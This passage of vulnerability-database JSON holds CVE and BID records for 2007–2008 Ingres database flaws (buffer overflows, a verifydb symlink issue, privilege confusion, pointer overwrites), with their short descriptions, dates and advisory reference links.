"id": "38001"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-01-29T00:00:00",
"db": "BID",
"id": "38001"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-02-09T15:31:00",
"db": "BID",
"id": "38001"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "38001"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Ingres Database Heap Buffer Overflow Vulnerability",
"sources": [
{
"db": "BID",
"id": "38001"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Boundary Condition Error",
"sources": [
{
"db": "BID",
"id": "38001"
}
],
"trust": 0.3
}
}
CVE-2008-3389 (GCVE-0-2008-3389)
Vulnerability from nvd – Published: 2008-08-05 19:20 – Updated: 2024-08-07 09:37- n/a
| URL | Tags |
|---|---|
| http://securitytracker.com/id?1020615 | vdb-entryx_refsource_SECTRACK |
| http://labs.idefense.com/intelligence/vulnerabili… | third-party-advisoryx_refsource_IDEFENSE |
| http://www.ingres.com/support/security-alert-080108.php | x_refsource_CONFIRM |
| http://www.vupen.com/english/advisories/2008/2292 | vdb-entryx_refsource_VUPEN |
| http://secunia.com/advisories/31398 | third-party-advisoryx_refsource_SECUNIA |
| http://www.vupen.com/english/advisories/2008/2313 | vdb-entryx_refsource_VUPEN |
| http://secunia.com/advisories/31357 | third-party-advisoryx_refsource_SECUNIA |
| https://exchange.xforce.ibmcloud.com/vulnerabilit… | vdb-entryx_refsource_XF |
| http://www.securityfocus.com/archive/1/495177/100… | mailing-listx_refsource_BUGTRAQ |
| http://www.securityfocus.com/bid/30512 | vdb-entryx_refsource_BID |
| https://support.ca.com/irj/portal/anonymous/phpsu… | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T09:37:26.380Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "1020615",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://securitytracker.com/id?1020615"
},
{
"name": "20080801 Ingres Database for Linux libbecompat Stack Based Buffer Overflow Vulnerability",
"tags": [
"third-party-advisory",
"x_refsource_IDEFENSE",
"x_transferred"
],
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=732"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.ingres.com/support/security-alert-080108.php"
},
{
"name": "ADV-2008-2292",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2008/2292"
},
{
"name": "31398",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/31398"
},
{
"name": "ADV-2008-2313",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2008/2313"
},
{
"name": "31357",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/31357"
},
{
"name": "ingres-libbecompat-bo(44179)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/44179"
},
{
"name": "20080806 CA Products That Embed Ingres Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/495177/100/0/threaded"
},
{
"name": "30512",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/30512"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=181989"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2008-08-01T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Stack-based buffer overflow in the libbecompat library in Ingres 2.6, Ingres 2006 release 1 (aka 9.0.4), and Ingres 2006 release 2 (aka 9.1.0) on Linux and HP-UX allows local users to gain privileges by setting a long value of an environment variable before running (1) verifydb, (2) iimerge, or (3) csreport."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-11T19:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "1020615",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://securitytracker.com/id?1020615"
},
{
"name": "20080801 Ingres Database for Linux libbecompat Stack Based Buffer Overflow Vulnerability",
"tags": [
"third-party-advisory",
"x_refsource_IDEFENSE"
],
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=732"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.ingres.com/support/security-alert-080108.php"
},
{
"name": "ADV-2008-2292",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2008/2292"
},
{
"name": "31398",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/31398"
},
{
"name": "ADV-2008-2313",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2008/2313"
},
{
"name": "31357",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/31357"
},
{
"name": "ingres-libbecompat-bo(44179)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/44179"
},
{
"name": "20080806 CA Products That Embed Ingres Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/495177/100/0/threaded"
},
{
"name": "30512",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/30512"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=181989"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2008-3389",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Stack-based buffer overflow in the libbecompat library in Ingres 2.6, Ingres 2006 release 1 (aka 9.0.4), and Ingres 2006 release 2 (aka 9.1.0) on Linux and HP-UX allows local users to gain privileges by setting a long value of an environment variable before running (1) verifydb, (2) iimerge, or (3) csreport."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "1020615",
"refsource": "SECTRACK",
"url": "http://securitytracker.com/id?1020615"
},
{
"name": "20080801 Ingres Database for Linux libbecompat Stack Based Buffer Overflow Vulnerability",
"refsource": "IDEFENSE",
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=732"
},
{
"name": "http://www.ingres.com/support/security-alert-080108.php",
"refsource": "CONFIRM",
"url": "http://www.ingres.com/support/security-alert-080108.php"
},
{
"name": "ADV-2008-2292",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2008/2292"
},
{
"name": "31398",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/31398"
},
{
"name": "ADV-2008-2313",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2008/2313"
},
{
"name": "31357",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/31357"
},
{
"name": "ingres-libbecompat-bo(44179)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/44179"
},
{
"name": "20080806 CA Products That Embed Ingres Multiple Vulnerabilities",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/495177/100/0/threaded"
},
{
"name": "30512",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/30512"
},
{
"name": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=181989",
"refsource": "CONFIRM",
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=181989"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2008-3389",
"datePublished": "2008-08-05T19:20:00.000Z",
"dateReserved": "2008-07-30T00:00:00.000Z",
"dateUpdated": "2024-08-07T09:37:26.380Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2008-3356 (GCVE-0-2008-3356)
Vulnerability from nvd – Published: 2008-08-05 19:20 – Updated: 2024-08-07 09:37- n/a
| URL | Tags |
|---|---|
| http://www.ingres.com/support/security-alert-080108.php | x_refsource_CONFIRM |
| http://www.vupen.com/english/advisories/2008/2292 | vdb-entryx_refsource_VUPEN |
| http://secunia.com/advisories/31398 | third-party-advisoryx_refsource_SECUNIA |
| http://securitytracker.com/id?1020613 | vdb-entryx_refsource_SECTRACK |
| http://www.vupen.com/english/advisories/2008/2313 | vdb-entryx_refsource_VUPEN |
| http://secunia.com/advisories/31357 | third-party-advisoryx_refsource_SECUNIA |
| https://exchange.xforce.ibmcloud.com/vulnerabilit… | vdb-entryx_refsource_XF |
| http://www.securityfocus.com/archive/1/495177/100… | mailing-listx_refsource_BUGTRAQ |
| http://www.securityfocus.com/bid/30512 | vdb-entryx_refsource_BID |
| https://support.ca.com/irj/portal/anonymous/phpsu… | x_refsource_CONFIRM |
| http://labs.idefense.com/intelligence/vulnerabili… | third-party-advisoryx_refsource_IDEFENSE |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T09:37:26.794Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.ingres.com/support/security-alert-080108.php"
},
{
"name": "ADV-2008-2292",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2008/2292"
},
{
"name": "31398",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/31398"
},
{
"name": "1020613",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://securitytracker.com/id?1020613"
},
{
"name": "ADV-2008-2313",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2008/2313"
},
{
"name": "31357",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/31357"
},
{
"name": "ingres-verifydb-symlink(44177)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/44177"
},
{
"name": "20080806 CA Products That Embed Ingres Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/495177/100/0/threaded"
},
{
"name": "30512",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/30512"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=181989"
},
{
"name": "20080801 Ingres Database for Linux verifydb Insecure File Permissions Modification Vulnerability",
"tags": [
"third-party-advisory",
"x_refsource_IDEFENSE",
"x_transferred"
],
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=731"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2008-08-01T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "verifydb in Ingres 2.6, Ingres 2006 release 1 (aka 9.0.4), and Ingres 2006 release 2 (aka 9.1.0) on Linux and other Unix platforms sets the ownership or permissions of an iivdb.log file without verifying that it is the application\u0027s own log file, which allows local users to overwrite arbitrary files by creating a symlink with an iivdb.log filename."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-11T19:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.ingres.com/support/security-alert-080108.php"
},
{
"name": "ADV-2008-2292",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2008/2292"
},
{
"name": "31398",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/31398"
},
{
"name": "1020613",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://securitytracker.com/id?1020613"
},
{
"name": "ADV-2008-2313",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2008/2313"
},
{
"name": "31357",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/31357"
},
{
"name": "ingres-verifydb-symlink(44177)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/44177"
},
{
"name": "20080806 CA Products That Embed Ingres Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/495177/100/0/threaded"
},
{
"name": "30512",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/30512"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=181989"
},
{
"name": "20080801 Ingres Database for Linux verifydb Insecure File Permissions Modification Vulnerability",
"tags": [
"third-party-advisory",
"x_refsource_IDEFENSE"
],
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=731"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2008-3356",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "verifydb in Ingres 2.6, Ingres 2006 release 1 (aka 9.0.4), and Ingres 2006 release 2 (aka 9.1.0) on Linux and other Unix platforms sets the ownership or permissions of an iivdb.log file without verifying that it is the application\u0027s own log file, which allows local users to overwrite arbitrary files by creating a symlink with an iivdb.log filename."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.ingres.com/support/security-alert-080108.php",
"refsource": "CONFIRM",
"url": "http://www.ingres.com/support/security-alert-080108.php"
},
{
"name": "ADV-2008-2292",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2008/2292"
},
{
"name": "31398",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/31398"
},
{
"name": "1020613",
"refsource": "SECTRACK",
"url": "http://securitytracker.com/id?1020613"
},
{
"name": "ADV-2008-2313",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2008/2313"
},
{
"name": "31357",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/31357"
},
{
"name": "ingres-verifydb-symlink(44177)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/44177"
},
{
"name": "20080806 CA Products That Embed Ingres Multiple Vulnerabilities",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/495177/100/0/threaded"
},
{
"name": "30512",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/30512"
},
{
"name": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=181989",
"refsource": "CONFIRM",
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=181989"
},
{
"name": "20080801 Ingres Database for Linux verifydb Insecure File Permissions Modification Vulnerability",
"refsource": "IDEFENSE",
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=731"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2008-3356",
"datePublished": "2008-08-05T19:20:00.000Z",
"dateReserved": "2008-07-28T00:00:00.000Z",
"dateUpdated": "2024-08-07T09:37:26.794Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-6334 (GCVE-0-2007-6334)
Vulnerability from nvd – Published: 2007-12-20 23:00 – Updated: 2024-08-07 16:02- n/a
| URL | Tags |
|---|---|
| http://www.vupen.com/english/advisories/2007/4303 | vdb-entryx_refsource_VUPEN |
| http://www.securitytracker.com/id?1019134 | vdb-entryx_refsource_SECTRACK |
| http://www.osvdb.org/39358 | vdb-entryx_refsource_OSVDB |
| http://www.ingres.com/support/security-alertDec17.php | x_refsource_CONFIRM |
| http://secunia.com/advisories/28187 | third-party-advisoryx_refsource_SECUNIA |
| http://www.securityfocus.com/bid/26959 | vdb-entryx_refsource_BID |
| http://secunia.com/advisories/28183 | third-party-advisoryx_refsource_SECUNIA |
| http://supportconnectw.ca.com/public/ingres/infod… | x_refsource_CONFIRM |
| http://www.vupen.com/english/advisories/2007/4304 | vdb-entryx_refsource_VUPEN |
| http://www.securityfocus.com/archive/1/485448/100… | mailing-listx_refsource_BUGTRAQ |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T16:02:36.365Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "ADV-2007-4303",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2007/4303"
},
{
"name": "1019134",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id?1019134"
},
{
"name": "39358",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://www.osvdb.org/39358"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.ingres.com/support/security-alertDec17.php"
},
{
"name": "28187",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/28187"
},
{
"name": "26959",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/26959"
},
{
"name": "28183",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/28183"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://supportconnectw.ca.com/public/ingres/infodocs/ingresmswin-secnot.asp"
},
{
"name": "ADV-2007-4304",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2007/4304"
},
{
"name": "20071221 [CAID 35970]: CA Products That Embed Ingres Authentication Vulnerability",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/485448/100/0/threaded"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-12-20T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Ingres 2.5 and 2.6 on Windows, as used in multiple CA products and possibly other products, assigns the privileges and identity of users to be the same as the first user, which allows remote attackers to gain privileges."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-15T20:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "ADV-2007-4303",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2007/4303"
},
{
"name": "1019134",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id?1019134"
},
{
"name": "39358",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://www.osvdb.org/39358"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.ingres.com/support/security-alertDec17.php"
},
{
"name": "28187",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/28187"
},
{
"name": "26959",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/26959"
},
{
"name": "28183",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/28183"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://supportconnectw.ca.com/public/ingres/infodocs/ingresmswin-secnot.asp"
},
{
"name": "ADV-2007-4304",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2007/4304"
},
{
"name": "20071221 [CAID 35970]: CA Products That Embed Ingres Authentication Vulnerability",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/485448/100/0/threaded"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-6334",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Ingres 2.5 and 2.6 on Windows, as used in multiple CA products and possibly other products, assigns the privileges and identity of users to be the same as the first user, which allows remote attackers to gain privileges."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "ADV-2007-4303",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2007/4303"
},
{
"name": "1019134",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id?1019134"
},
{
"name": "39358",
"refsource": "OSVDB",
"url": "http://www.osvdb.org/39358"
},
{
"name": "http://www.ingres.com/support/security-alertDec17.php",
"refsource": "CONFIRM",
"url": "http://www.ingres.com/support/security-alertDec17.php"
},
{
"name": "28187",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/28187"
},
{
"name": "26959",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/26959"
},
{
"name": "28183",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/28183"
},
{
"name": "http://supportconnectw.ca.com/public/ingres/infodocs/ingresmswin-secnot.asp",
"refsource": "CONFIRM",
"url": "http://supportconnectw.ca.com/public/ingres/infodocs/ingresmswin-secnot.asp"
},
{
"name": "ADV-2007-4304",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2007/4304"
},
{
"name": "20071221 [CAID 35970]: CA Products That Embed Ingres Authentication Vulnerability",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/485448/100/0/threaded"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-6334",
"datePublished": "2007-12-20T23:00:00.000Z",
"dateReserved": "2007-12-13T00:00:00.000Z",
"dateUpdated": "2024-08-07T16:02:36.365Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-3336 (GCVE-0-2007-3336)
Vulnerability from nvd – Published: 2007-06-22 18:00 – Updated: 2024-08-07 14:14- n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T14:14:12.898Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "ADV-2007-2288",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2007/2288"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
},
{
"name": "25756",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/25756"
},
{
"name": "25775",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/25775"
},
{
"name": "ADV-2007-2290",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2007/2290"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
},
{
"name": "ingres-unspecified-code-execution(34993)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34993"
},
{
"name": "ingres-pointer-code-execution(35000)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35000"
},
{
"name": "24585",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/24585"
},
{
"name": "37486",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/37486"
},
{
"name": "20070625 Ingres Unauthenticated Pointer Overwrite 1",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://archives.neohapsis.com/archives/bugtraq/2007-06/0302.html"
},
{
"name": "20070625 Ingres Unauthenticated Pointer Overwrite 2",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/472193/100/0/threaded"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-1/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-06-22T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Multiple \"pointer overwrite\" vulnerabilities in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (formerly Computer Associates) products, allow remote attackers to execute arbitrary code by sending certain TCP data at different times to the Ingres Communications Server Process (iigcc), which calls the (1) QUinsert or (2) QUremove functions with attacker-controlled input."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-16T14:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "ADV-2007-2288",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2007/2288"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
},
{
"name": "25756",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/25756"
},
{
"name": "25775",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/25775"
},
{
"name": "ADV-2007-2290",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
